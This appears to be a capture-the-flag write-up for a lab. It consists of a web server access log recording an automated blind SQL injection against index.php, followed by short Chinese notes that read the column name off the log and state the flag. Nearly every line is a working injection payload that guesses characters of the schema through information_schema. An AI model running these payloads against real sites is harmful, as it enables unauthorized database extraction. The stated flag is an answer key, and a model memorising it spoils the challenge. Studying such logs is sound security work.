172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'K',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'J',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'I',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'H',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'G',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'F',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'E',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'D',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'C',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'B',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'A',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'@',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'?',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%3E',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'=',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%3C',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20';',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20':',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'9',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'8',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'7',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'6',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'5',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'4',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'3',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'2',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'1',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'0',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'/',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'.',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'-',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20',',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'+',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 506 "-" "python-requests/2.26.0"
库名和表名table_name='flag'%20and%20table_schema='sqli'
,根据盲注原理能猜测每个位置注入的最后一个字符为该位置字符
即column
为flag
flag:sqli_flag_flag